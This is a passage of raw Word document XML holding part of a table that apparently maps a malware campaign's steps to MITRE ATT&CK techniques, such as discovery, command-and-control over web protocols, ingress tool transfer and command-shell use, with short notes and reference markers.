              <w:t>TA00</w:t>
            </w:r>
            <w:r w:rsidR="00250F5E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6AB3E6B6" w14:textId="3A576EBD" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00ED5880">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1049 System Network Connections Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="488773D4" w14:textId="0629657B" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D98B8DA" w14:textId="77777777" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AFB5625" w14:textId="4032AA65" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00A77D6E" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12A6B3A7" w14:textId="3C5D4D0C" w:rsidR="00A77D6E" w:rsidRPr="00ED5880" w:rsidRDefault="00D0443B" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2046D7D9" w14:textId="2E9F6A2F" w:rsidR="00A77D6E" w:rsidRPr="00D11489" w:rsidRDefault="00D11489" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A811A2" w:rsidRPr="002D1D50" w14:paraId="621817E3" w14:textId="77777777" w:rsidTr="000A72C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E81B52D" w14:textId="442DEDEE" w:rsidR="00A811A2" w:rsidRPr="002D1D50" w:rsidRDefault="00A811A2" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="004F43B4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01107CA2" w14:textId="77777777" w:rsidR="00A811A2" w:rsidRPr="002D1D50" w:rsidRDefault="00A811A2" w:rsidP="002B57F6">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7089FAF0" w14:textId="77777777" w:rsidR="00A811A2" w:rsidRPr="002D1D50" w:rsidRDefault="00A811A2" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>071</w:t>
            </w:r>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">.001 Application Layer </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Protocol :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="786CA9D8" w14:textId="7518A4F5" w:rsidR="00A811A2" w:rsidRPr="002D1D50" w:rsidRDefault="00650BEB" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="004F43B4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BBCB4FB" w14:textId="77777777" w:rsidR="00A811A2" w:rsidRPr="002D1D50" w:rsidRDefault="00A811A2" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11780895" w14:textId="2A021785" w:rsidR="00A811A2" w:rsidRPr="002D1D50" w:rsidRDefault="007013A9" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44EDF84C" w14:textId="0DF4ACEC" w:rsidR="00A811A2" w:rsidRPr="002D1D50" w:rsidRDefault="00C23065" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="785B4FFA" w14:textId="590B1DD1" w:rsidR="00A811A2" w:rsidRPr="002D1D50" w:rsidRDefault="00D11489" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="005305F1">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>This technique to provide more detail on step below</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A811A2" w:rsidRPr="002D1D50" w14:paraId="4F0D43B2" w14:textId="77777777" w:rsidTr="000A72C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51595939" w14:textId="58D537EE" w:rsidR="00A811A2" w:rsidRPr="002D1D50" w:rsidRDefault="00A811A2" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="004F43B4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BC0BFEA" w14:textId="77777777" w:rsidR="00A811A2" w:rsidRPr="002D1D50" w:rsidRDefault="00A811A2" w:rsidP="002B57F6">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5C8F5689" w14:textId="77777777" w:rsidR="00A811A2" w:rsidRPr="002D1D50" w:rsidRDefault="00A811A2" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1102.002 Web Service: Bidirectional Communication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01F7C095" w14:textId="5FFD047F" w:rsidR="00A811A2" w:rsidRPr="002D1D50" w:rsidRDefault="00650BEB" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00A811A2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18A3BC71" w14:textId="77777777" w:rsidR="00A811A2" w:rsidRPr="002D1D50" w:rsidRDefault="00A811A2" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C810A40" w14:textId="77777777" w:rsidR="00A811A2" w:rsidRPr="002D1D50" w:rsidRDefault="00A811A2" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5D7329DE" w14:textId="588C22E2" w:rsidR="00A811A2" w:rsidRPr="002D1D50" w:rsidRDefault="00D0443B" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="261A03B7" w14:textId="1D547F00" w:rsidR="00A811A2" w:rsidRPr="002D1D50" w:rsidRDefault="00532E65" w:rsidP="002B57F6">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] [6] </w:t>
            </w:r>
            <w:r w:rsidR="00A811A2" w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Initial installation connects to C&amp;C</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w14:paraId="170269E0" w14:textId="77777777" w:rsidTr="000A72C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3799F265" w14:textId="725B049E" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="006F2964">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="004F43B4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FD56B24" w14:textId="5EF351E7" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="006F2964">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097BF4C9" w14:textId="77777777" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="006F2964">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1105 Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="349B3BD4" w14:textId="643BFD26" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="006F2964">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="004F43B4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44BFE3AB" w14:textId="77777777" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="006F2964">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="095A011E" w14:textId="72BFBA7B" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00A77D6E" w:rsidP="006F2964">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="736A790A" w14:textId="13230E0C" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00D0443B" w:rsidP="006F2964">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="56B27369" w14:textId="70526402" w:rsidR="00A77D6E" w:rsidRPr="002D1D50" w:rsidRDefault="00940299" w:rsidP="006F2964">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidR="00A77D6E" w:rsidRPr="002D1D50">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Install </w:t>
            </w:r>
            <w:r w:rsidR="00A77D6E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>second stage tool (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00A77D6E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Bubblewrap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00A77D6E">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w14:paraId="3AD20E36" w14:textId="77777777" w:rsidTr="000A72C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F9B3C63" w14:textId="5FBFEC00" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="006F2964">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="004F43B4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="52A46AF9" w14:textId="230D484B" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="006F2964">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08A8BFEE" w14:textId="77777777" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="006F2964">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1059.003 Command and Scripting Interpreter: Windows Command Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10A49739" w14:textId="4F2D0EE6" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="006F2964">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="004F43B4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B4A3249" w14:textId="77777777" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="006F2964">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="557" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3289673E" w14:textId="40620010" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="006F2964">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CD7CF66" w14:textId="1D6DE7F3" w:rsidR="00D0443B" w:rsidRPr="00B857D7" w:rsidRDefault="00850CFA" w:rsidP="003B3635">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
            <w:r w:rsidR="002828B6">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidR="003B3635" w:rsidRPr="003B3635">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-PER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E3C4FE7" w14:textId="2AA1725C" w:rsidR="00A77D6E" w:rsidRPr="00B857D7" w:rsidRDefault="00A77D6E" w:rsidP="006F2964">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>To install second stage tool above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00672F86" w:rsidRPr="00ED5880" w14:paraId="5835EAA9" w14:textId="77777777" w:rsidTr="000A72C2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75AB74DE" w14:textId="77777777" w:rsidR="00672F86" w:rsidRPr="00F808AD" w:rsidRDefault="00672F86" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1893" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4DAF4F99" w14:textId="77777777" w:rsidR="00672F86" w:rsidRPr="00F808AD" w:rsidRDefault="00672F86" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2408" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="598D9099" w14:textId="12052601" w:rsidR="00672F86" w:rsidRPr="00672F86" w:rsidRDefault="00672F86" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
              <w:t>Techniques unclear here</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="661" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26F12CA1" w14:textId="77777777" w:rsidR="00672F86" w:rsidRPr="00F808AD" w:rsidRDefault="00672F86" w:rsidP="0077286F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
                <w:highlight w:val="lightGray"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="699" w:type="dxa"/>
          </w:tcPr>
